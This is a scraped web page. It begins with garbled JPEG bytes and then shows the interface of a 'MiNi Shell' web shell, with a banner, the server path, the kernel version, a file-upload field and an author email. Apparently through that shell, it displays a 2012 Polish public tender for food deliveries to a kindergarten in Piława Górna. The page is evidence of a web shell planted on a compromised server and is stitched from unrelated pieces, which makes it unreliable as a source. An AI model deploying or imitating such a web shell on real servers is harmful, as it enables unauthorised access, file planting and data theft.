JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120308/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120308/72142-N-2012.html

<p class="kh_header"><b>Piława Górna: Dostawa artykułów żywnościowych do przedszkola</b><br>
<b>Numer ogłoszenia: 72142 - 2012; data zamieszczenia: 08.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Publiczne , ul. A. Mickiewicza 5, 58-240 Piława Górna, woj. dolnośląskie, tel. 74 8371218, faks 74 8371218.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://przedszkolepilawa.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do przedszkola.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy artykułów żywności do przedszkola wg grup:
1. Produkty mleczarskie
2. Świeże pieczywo
3. Świeże mięso i wędliny
4. Świeże warzywa, owoce i jaja
5. Inne produkty spożywcze
6. Produkty mrożone.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli  
przepisy prawa nakładają obowiązek ich posiadania z mocy art. 22 ust. 1 ustawy PZP- Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu  metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie zał. nr 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli  
przepisy prawa nakładają obowiązek ich posiadania z mocy art. 22 ust. 1 ustawy PZP- Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu  metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie zał. nr 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli  
przepisy prawa nakładają obowiązek ich posiadania z mocy art. 22 ust. 1 ustawy PZP- Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu  metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie zał. nr 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli  
przepisy prawa nakładają obowiązek ich posiadania z mocy art. 22 ust. 1 ustawy PZP- Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu  metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie zał. nr 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli  
przepisy prawa nakładają obowiązek ich posiadania z mocy art. 22 ust. 1 ustawy PZP- Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu  metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie zał. nr 3 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy  wg wzoru -  załącznik nr 1 do SIWZ                           
2)  Oświadczenie, że Wykonawca zapoznał się z warunkami przetargu określonymi w SIWZ i przyjmuje je bez zastrzeżeń                                                          
3)  Zaakceptowany (zaparafowany) projekt umowy przez osobę upoważnioną do reprezentowania Wykonawcy wg wzoru - załącznik nr 5 do SIWZ.
4)  Wypełniony wykaz zamawianych towarów wg załącznika nr 2 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przedszkolepilawa.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Publiczne w Piławie Górnej
58-240 Piława Górna, ul. Adama Mickiewicza 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2012 godzina 09:00, miejsce: Przedszkole Publiczne w Piławie Górnej
58-240 Piława Górna, ul. Adama Mickiewicza 5 (w gabinecie dyrektora).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 31.12.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - Produkty mleczarskie - Załącznik nr 2/1 do SIZW
Mleko 2%, 1 litr	szt.	1500
Masło 200 g	Osełkowe   szt.	800
Twaróg półtłusty	Rawicz       kg	200
Ser żółty (salami i edamski)	Chojnice   kg	30
Serek topiony	Hochland   kg	20
Margaryna roślinna  500 g 	Bielmar    szt.	90
Śmietana 18% 400 ml	Piątnica   szt.	700
Jogurt owocowy	Jogobella (mix)       szt.	700
Serek homogenizowany owocowy (mix)   Danio      szt.	500
Pudding 150 g   Zott   szt.   500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świeże pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - Świeże pieczywo - Załącznik nr 2/2 do SIZW
Chleb krojony 550 g  Zwykły  szt.  900
Bułka razowa   60 g             szt.  700
Bułka słodka    80 g	 szt.  500
Bułka zwykła   80 g		 szt.  600
Chleb razowy 500 g	 szt.  800
Rogal             80 g	 szt.  500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świeże mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - Świeże mięso i wędliny - Załącznik nr 2/3 do SIZW
Antrykot		        kg	   50
Filet z indyka	        kg	   10
Karczek bez kości	        kg	   50
Kiełbasa zwyczajna	        kg	   50
Kiełbasa śląska	        kg	   10
Kiełbasa wiejska	        kg	   10
Kurczak		        kg	   80
Mięso mielone wieprzowe / wołowe	kg	60
Wołowina na pieczeń		kg	20
Parówki wieprzowe / drobiowe	kg	20
Filet z kurczaka		kg	20
Szynka bez kości		kg	50
Udka z kurczaka		kg	30
Wątroba wieprzowa	kg	20
Szynka wieprzowa		kg	10
Szynka drobiowa		kg	10
Schab bez kości		kg	120
Polędwica wieprzowa		kg	10
Polędwica drobiowa		kg	10
Kiełbasa szynkowa		kg	10
Polędwica sopocka		kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świeże warzywa owoce i jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV - Świeże warzywa owoce i jaja  - Załącznik nr 2/4 do SIZW
Banany		kg	200
Buraki		kg	100
Cebula		kg	170
Cytryna		kg	30
Fasola		kg	20
Groch		kg	20
Jabłka		kg	600
Kalafior		szt.	30
Kapusta biała		kg	80
Kapusta czerwona		kg	40
Kapusta kiszona		kg	150
Kapusta włoska		szt.	30
Kapusta pekińska		kg	40
Mandarynki		kg	90
Marchewka		kg	200
Ogórek		kg	80
Papryka		kg	20
Pieczarki		kg	20
Pietruszka - korzeń             kg	20
Pomidor		kg	20
Pomarańcze	kg	80
Por		szt.	60
Rzodkiewka		szt.	90
Sałata		szt.	130
Seler		kg	60
Szczypiorek	szt.	180
Śliwki		kg	10
Truskawki	kg	20
Ziemniaki		kg	3500
Botwinka - pęczki		szt.	10
Brukselka		             kg	5
Brzoskwinie		kg	20
Fasolka szparagowa	kg	10
Koperek - pęczek		szt.	30
Natka pietruszki - pęczek	szt.	300
Nektarynka		kg	30
Jajka kurze		szt.	2500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Inne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V - Inne produkty spożywcze - Załącznik nr 2/5 do SIZW
Barszcz biały 66g	Winiary    szt.	200
Bułka tarta 500 g	Mamut     szt.	100
Płatki śniadaniowe kukurydziane 250 g	Nestle  kg   10
Płatki śniadaniowe pszenne w miodzie 250 g	Nestle Kangu  kg	10
Płatki śniadaniowe czekoladowe 250 g	Chocapic     kg	10
Płatki śniadaniowe wielozbożowe 250 g Cheerios	    kg	10
Cukier biały    1 kg		kg	400
Cukier puder 500 g		kg	5
Cukier wanilinowy 16 g	szt.	90
Czekolada mleczna  200 g	szt.	300
Czosnek granulowany	szt.	20
Przyprawa Kuchrek   200 g	szt.	80
Drożdze       100 g		szt.	40
Dżem słoik (mix) 100 g	Łowicz   szt.	150
Galaretka owocowa (mix) 75 g   Winiary szt.	60
Groszek konserwowy 400 g	Pudliszki   szt.	60
Herbata ekspresowa 100 g		szt.	60
Herbatniki        50 g              szt.	300
Kakao Decomoreno 200 g		szt.    10
Kasza jęczmienna Sonko  1 kg	kg     20
Kasza jęczmienna w woreczkach Sonko  4 x 100 g  szt.    100
Kasza manna  500 g	kg        10
Kawa zbożowa  Anatol 147 g	   szt.	60
Kisiel owocowy (mix)  Winiary  szt.	120
Koncentrat pomidorowy 210 g Pudliszki  szt.	100
Konserwa mięsna  300 g Sokołów          szt.	70
Konserwa rybna w pomidorach (makrela, śledź)	Łosoś      szt     100
Konserwa rybna w oleju (makrela, śledź)	Łosoś      szt.     40
Krem Nutella 630 g	    szt.	40
Kukurydza 400 g	Pudliszki    szt.	80
Kwasek cytrynowy		szt.	10
Liść laurowy		szt.	10
Maggi 960 g  Knorr	             szt.	20
Majeranek		szt.	10
Makaron świderki   400 g	Węgierski  szt.	200
Makaron łazanka 400 g	Węgierski  szt.	50
Makaron nitka 400 g	Węgierski  szt.	60
Makaron zacierka  250 g		  szt. 	150
Mąka tortowa typ 450  1 kg		  szt.	200
Mąka ziemniaczana 500 g		  kg	10
Majonez 330 g		szt.	50
Sok Kubuś - duży		szt. 	300
Miód prawdziwy wielokwiat. 380 g	szt.	20
Musztarda sarepska 150 g	Kamis      szt. 	20
Ogórek konserwowy 870 g		szt. 	100
Olej rzepakowy1 l	Kujawski              szt.	150
Papryka konserwowa 650 g	Krakus    szt.	40
Pasta rybna 150 g		szt.	120
Pasztet drobiowy  160 g	Prochowicki    szt.	120
Pieprz 10 g		szt. 	10
Przecier ogórkowy  280 g	Frubex    szt. 	60
Rosołek drobiowy   120 g	Winiary   szt.	50
Ryż 1 kg	Sonko                  kg	50
Papryka w proszku 10 g	szt.	5
Ryż w woreczkach 4 x 100 g	Sonko    szt.	200
Sos pomidorowy do makaronu Winiary szt.	120
Sól 1 kg		kg	120
Suchary	Mamut    szt.	20
Syrop (mix) 440 g	Pińczów   szt.	500
Cukierki (mix)		 kg	10
Szczaw - przecier  280 g	Frubex    szt.	60
Woda mineralna niegazowana 1 l	szt.	200
Paluszki		szt.	200
Ciastka		kg	50
Soczki		szt	900
Wafelki		szt	300
Ziele angielskie	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Produkty mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VI - Produkty mrożone - Załącznik nr 2/6 do SIZW
Mrożonka -marchewka kostka 2,5 kg	szt.	100
Mrożonka - włoszczyzna 2,5 kg	szt.	200
Mrożonka - truskawki 2,5 kg		szt.	30
Mrożonka - fasolka szparagowa 2,5 kg		szt.	30
Mrożonka - kalafior 2,5 kg	szt.	30
Mintaj		kg	170
Morszczuk	kg	20
Dorsz		kg	50
Miruna		kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com